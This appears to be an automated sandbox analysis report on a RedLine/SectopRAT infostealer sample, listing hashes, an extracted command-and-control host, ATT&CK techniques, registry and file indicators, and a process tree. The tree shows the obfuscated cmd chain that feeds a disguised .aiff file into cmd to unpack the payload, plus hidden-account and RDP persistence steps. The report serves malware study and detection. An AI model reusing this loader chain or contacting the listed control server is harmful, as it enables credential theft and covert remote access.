redline | 02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca

Analysis

max time kernel
148s
max time network
149s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
27-12-2024 07:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

34807a743f2d680eef051852eaef0b16.exe
Size

4.1MB
MD5

34807a743f2d680eef051852eaef0b16
SHA1

4e63843e9c51f907952bb2f51d6b3866f81f7bd6
SHA256

02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca
SHA512

65acb9f797e244e62cbe9aafae8acb55dbecf88c7924b333e787d907226debfad8324649eb629bdac864dcaf8cea1139a56b1e7b48933fef314e2f040978166a
SSDEEP

98304:G1EESMlQ/9IsCMdegeFbD+dQ5oVOAoso2iFugO+Nthm5mBF:G1EEP42s1cgzKoVK2iFtOWHmOF

Score

10^/10

redline sectoprat adsbb defense_evasion discovery evasion execution infostealer lateral_movement persistence privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Family

redline

Botnet

adsbb

21jhss.club:80

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

resource	yara_rule
behavioral1/memory/1688-69-0x0000000000090000-0x00000000000AC000-memory.dmp	family_redline
behavioral1/memory/1688-68-0x0000000000090000-0x00000000000AC000-memory.dmp	family_redline
behavioral1/memory/1688-65-0x0000000000090000-0x00000000000AC000-memory.dmp	family_redline

Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 3 IoCs

resource	yara_rule
behavioral1/memory/1688-69-0x0000000000090000-0x00000000000AC000-memory.dmp	family_sectoprat
behavioral1/memory/1688-68-0x0000000000090000-0x00000000000AC000-memory.dmp	family_sectoprat
behavioral1/memory/1688-65-0x0000000000090000-0x00000000000AC000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
1512	net.exe
1940	net1.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
31	2836	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2736	powershell.exe
1912	powershell.exe
1812	powershell.exe
2772	powershell.exe
3064	powershell.exe
2400	powershell.exe
1176	powershell.exe
2796	powershell.exe
1672	powershell.exe
572	powershell.exe
1704	powershell.exe
2672	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Modifies Windows Firewall 2 TTPs 6 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1100	netsh.exe
2236	netsh.exe
2796	netsh.exe
2392	netsh.exe
1612	netsh.exe
1364	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 3 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll"	RDPWInst.exe

Executes dropped EXE 13 IoCs

pid	Process
2572	Rifiutare.exe.com
2644	Rifiutare.exe.com
1976	Uno.exe.com
1148	Uno.exe.com
2016	Inebriato.exe.com
2276	Inebriato.exe.com
1688	RegAsm.exe
1696	RegAsm.exe
2464	RegAsm.exe
1820	RDPWInst.exe
788	RDPWInst.exe
2564	RDPWInst.exe
1364	RDPWInst.exe

Loads dropped DLL 15 IoCs

pid	Process
2656	cmd.exe
2656	cmd.exe
2656	cmd.exe
2644	Rifiutare.exe.com
1148	Uno.exe.com
1688	RegAsm.exe
2276	Inebriato.exe.com
1696	RegAsm.exe
2464	RegAsm.exe
2668	cmd.exe
2668	cmd.exe
2116	Process not Found
2668	cmd.exe
2668	cmd.exe
1808	svchost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
23	raw.githubusercontent.com
8	raw.githubusercontent.com
9	raw.githubusercontent.com
22	raw.githubusercontent.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/memory/2464-89-0x0000000000460000-0x000000000063F000-memory.dmp	autoit_exe
behavioral1/memory/2464-86-0x0000000000460000-0x000000000063F000-memory.dmp	autoit_exe
behavioral1/memory/2464-83-0x0000000000460000-0x000000000063F000-memory.dmp	autoit_exe

Drops file in System32 directory 21 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\dnsrsvlr.log	svchost.exe
File opened for modification	C:\Windows\system32\CatRoot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\catdb	svchost.exe
File opened for modification	C:\Windows\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb	svchost.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\System32\null	cmd.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\null	cmd.exe
File opened for modification	C:\Windows\System32\null	cmd.exe
File opened for modification	C:\Windows\system32\CatRoot2\edb.log	svchost.exe
File opened for modification	C:\Windows\System32\asyncreg.log	svchost.exe
File opened for modification	C:\Windows\system32\CatRoot2\edb.chk	svchost.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Hide Artifacts: Hidden Users 1 TTPs 3 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\GuDNaDzHza = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\GuDNaDzHza = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\GuDNaDzHza = "0"	reg.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2644 set thread context of 1688	2644	Rifiutare.exe.com	45
PID 1148 set thread context of 1696	1148	Uno.exe.com	46
PID 2276 set thread context of 2464	2276	Inebriato.exe.com	47

Drops file in Program Files directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\RDP Wrapper\RDPWInst.exe	RegAsm.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.bat	RegAsm.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\RDPWInst.exe	RegAsm.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.bat	RegAsm.exe
File opened for modification	C:\Program Files\RDP Wrapper	RegAsm.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1292	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Inebriato.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Uno.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	makecab.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rifiutare.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rifiutare.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Inebriato.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Uno.exe.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2220	PING.EXE

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
2552	timeout.exe
928	timeout.exe
2788	timeout.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2220	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1484	schtasks.exe
2536	schtasks.exe
1164	schtasks.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	31	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
2796	powershell.exe
2672	powershell.exe
2736	powershell.exe
2772	powershell.exe
3064	powershell.exe
2400	powershell.exe
1912	powershell.exe
1672	powershell.exe
1808	svchost.exe
1808	svchost.exe
572	powershell.exe
1704	powershell.exe
1812	powershell.exe
1176	powershell.exe

Suspicious behavior: LoadsDriver 5 IoCs

pid	Process
2116	Process not Found
2132	Process not Found
1808	svchost.exe
1808	svchost.exe
1808	svchost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1688	RegAsm.exe
Token: SeIncreaseQuotaPrivilege	916	WMIC.exe
Token: SeSecurityPrivilege	916	WMIC.exe
Token: SeTakeOwnershipPrivilege	916	WMIC.exe
Token: SeLoadDriverPrivilege	916	WMIC.exe
Token: SeSystemProfilePrivilege	916	WMIC.exe
Token: SeSystemtimePrivilege	916	WMIC.exe
Token: SeProfSingleProcessPrivilege	916	WMIC.exe
Token: SeIncBasePriorityPrivilege	916	WMIC.exe
Token: SeCreatePagefilePrivilege	916	WMIC.exe
Token: SeBackupPrivilege	916	WMIC.exe
Token: SeRestorePrivilege	916	WMIC.exe
Token: SeShutdownPrivilege	916	WMIC.exe
Token: SeDebugPrivilege	916	WMIC.exe
Token: SeSystemEnvironmentPrivilege	916	WMIC.exe
Token: SeRemoteShutdownPrivilege	916	WMIC.exe
Token: SeUndockPrivilege	916	WMIC.exe
Token: SeManageVolumePrivilege	916	WMIC.exe
Token: 33	916	WMIC.exe
Token: 34	916	WMIC.exe
Token: 35	916	WMIC.exe
Token: SeIncreaseQuotaPrivilege	916	WMIC.exe
Token: SeSecurityPrivilege	916	WMIC.exe
Token: SeTakeOwnershipPrivilege	916	WMIC.exe
Token: SeLoadDriverPrivilege	916	WMIC.exe
Token: SeSystemProfilePrivilege	916	WMIC.exe
Token: SeSystemtimePrivilege	916	WMIC.exe
Token: SeProfSingleProcessPrivilege	916	WMIC.exe
Token: SeIncBasePriorityPrivilege	916	WMIC.exe
Token: SeCreatePagefilePrivilege	916	WMIC.exe
Token: SeBackupPrivilege	916	WMIC.exe
Token: SeRestorePrivilege	916	WMIC.exe
Token: SeShutdownPrivilege	916	WMIC.exe
Token: SeDebugPrivilege	916	WMIC.exe
Token: SeSystemEnvironmentPrivilege	916	WMIC.exe
Token: SeRemoteShutdownPrivilege	916	WMIC.exe
Token: SeUndockPrivilege	916	WMIC.exe
Token: SeManageVolumePrivilege	916	WMIC.exe
Token: 33	916	WMIC.exe
Token: 34	916	WMIC.exe
Token: 35	916	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2852	WMIC.exe
Token: SeSecurityPrivilege	2852	WMIC.exe
Token: SeTakeOwnershipPrivilege	2852	WMIC.exe
Token: SeLoadDriverPrivilege	2852	WMIC.exe
Token: SeSystemProfilePrivilege	2852	WMIC.exe
Token: SeSystemtimePrivilege	2852	WMIC.exe
Token: SeProfSingleProcessPrivilege	2852	WMIC.exe
Token: SeIncBasePriorityPrivilege	2852	WMIC.exe
Token: SeCreatePagefilePrivilege	2852	WMIC.exe
Token: SeBackupPrivilege	2852	WMIC.exe
Token: SeRestorePrivilege	2852	WMIC.exe
Token: SeShutdownPrivilege	2852	WMIC.exe
Token: SeDebugPrivilege	2852	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2852	WMIC.exe
Token: SeRemoteShutdownPrivilege	2852	WMIC.exe
Token: SeUndockPrivilege	2852	WMIC.exe
Token: SeManageVolumePrivilege	2852	WMIC.exe
Token: 33	2852	WMIC.exe
Token: 34	2852	WMIC.exe
Token: 35	2852	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2852	WMIC.exe
Token: SeSecurityPrivilege	2852	WMIC.exe
Token: SeTakeOwnershipPrivilege	2852	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2336 wrote to memory of 2840	2336	34807a743f2d680eef051852eaef0b16.exe	30
PID 2336 wrote to memory of 2840	2336	34807a743f2d680eef051852eaef0b16.exe	30
PID 2336 wrote to memory of 2840	2336	34807a743f2d680eef051852eaef0b16.exe	30
PID 2336 wrote to memory of 2840	2336	34807a743f2d680eef051852eaef0b16.exe	30
PID 2336 wrote to memory of 2728	2336	34807a743f2d680eef051852eaef0b16.exe	32
PID 2336 wrote to memory of 2728	2336	34807a743f2d680eef051852eaef0b16.exe	32
PID 2336 wrote to memory of 2728	2336	34807a743f2d680eef051852eaef0b16.exe	32
PID 2336 wrote to memory of 2728	2336	34807a743f2d680eef051852eaef0b16.exe	32
PID 2728 wrote to memory of 2656	2728	cmd.exe	34
PID 2728 wrote to memory of 2656	2728	cmd.exe	34
PID 2728 wrote to memory of 2656	2728	cmd.exe	34
PID 2728 wrote to memory of 2656	2728	cmd.exe	34
PID 2656 wrote to memory of 2736	2656	cmd.exe	35
PID 2656 wrote to memory of 2736	2656	cmd.exe	35
PID 2656 wrote to memory of 2736	2656	cmd.exe	35
PID 2656 wrote to memory of 2736	2656	cmd.exe	35
PID 2656 wrote to memory of 2572	2656	cmd.exe	36
PID 2656 wrote to memory of 2572	2656	cmd.exe	36
PID 2656 wrote to memory of 2572	2656	cmd.exe	36
PID 2656 wrote to memory of 2572	2656	cmd.exe	36
PID 2656 wrote to memory of 2632	2656	cmd.exe	37
PID 2656 wrote to memory of 2632	2656	cmd.exe	37
PID 2656 wrote to memory of 2632	2656	cmd.exe	37
PID 2656 wrote to memory of 2632	2656	cmd.exe	37
PID 2572 wrote to memory of 2644	2572	Rifiutare.exe.com	38
PID 2572 wrote to memory of 2644	2572	Rifiutare.exe.com	38
PID 2572 wrote to memory of 2644	2572	Rifiutare.exe.com	38
PID 2572 wrote to memory of 2644	2572	Rifiutare.exe.com	38
PID 2656 wrote to memory of 1976	2656	cmd.exe	39
PID 2656 wrote to memory of 1976	2656	cmd.exe	39
PID 2656 wrote to memory of 1976	2656	cmd.exe	39
PID 2656 wrote to memory of 1976	2656	cmd.exe	39
PID 2656 wrote to memory of 2452	2656	cmd.exe	40
PID 2656 wrote to memory of 2452	2656	cmd.exe	40
PID 2656 wrote to memory of 2452	2656	cmd.exe	40
PID 2656 wrote to memory of 2452	2656	cmd.exe	40
PID 1976 wrote to memory of 1148	1976	Uno.exe.com	41
PID 1976 wrote to memory of 1148	1976	Uno.exe.com	41
PID 1976 wrote to memory of 1148	1976	Uno.exe.com	41
PID 1976 wrote to memory of 1148	1976	Uno.exe.com	41
PID 2656 wrote to memory of 2016	2656	cmd.exe	42
PID 2656 wrote to memory of 2016	2656	cmd.exe	42
PID 2656 wrote to memory of 2016	2656	cmd.exe	42
PID 2656 wrote to memory of 2016	2656	cmd.exe	42
PID 2656 wrote to memory of 2220	2656	cmd.exe	43
PID 2656 wrote to memory of 2220	2656	cmd.exe	43
PID 2656 wrote to memory of 2220	2656	cmd.exe	43
PID 2656 wrote to memory of 2220	2656	cmd.exe	43
PID 2016 wrote to memory of 2276	2016	Inebriato.exe.com	44
PID 2016 wrote to memory of 2276	2016	Inebriato.exe.com	44
PID 2016 wrote to memory of 2276	2016	Inebriato.exe.com	44
PID 2016 wrote to memory of 2276	2016	Inebriato.exe.com	44
PID 2644 wrote to memory of 1688	2644	Rifiutare.exe.com	45
PID 2644 wrote to memory of 1688	2644	Rifiutare.exe.com	45
PID 2644 wrote to memory of 1688	2644	Rifiutare.exe.com	45
PID 2644 wrote to memory of 1688	2644	Rifiutare.exe.com	45
PID 2644 wrote to memory of 1688	2644	Rifiutare.exe.com	45
PID 2644 wrote to memory of 1688	2644	Rifiutare.exe.com	45
PID 2644 wrote to memory of 1688	2644	Rifiutare.exe.com	45
PID 2644 wrote to memory of 1688	2644	Rifiutare.exe.com	45
PID 1148 wrote to memory of 1696	1148	Uno.exe.com	46
PID 1148 wrote to memory of 1696	1148	Uno.exe.com	46
PID 1148 wrote to memory of 1696	1148	Uno.exe.com	46
PID 1148 wrote to memory of 1696	1148	Uno.exe.com	46

C:\Users\Admin\AppData\Local\Temp\34807a743f2d680eef051852eaef0b16.exe
"C:\Users\Admin\AppData\Local\Temp\34807a743f2d680eef051852eaef0b16.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2336
- C:\Windows\SysWOW64\makecab.exe
  "C:\Windows\System32\makecab.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2840
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c WEHuzypTIfJLQWpZ & HMYPflMZogRtPmKziXCRecxqxWV & rIgSHQwdwGHxUulRaOS & cmd < Adunazione.aiff
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2728
- - C:\Windows\SysWOW64\cmd.exe
    cmd
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2656
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
      4⤵
      PID:2736
  - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com
      Rifiutare.exe.com D
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2572
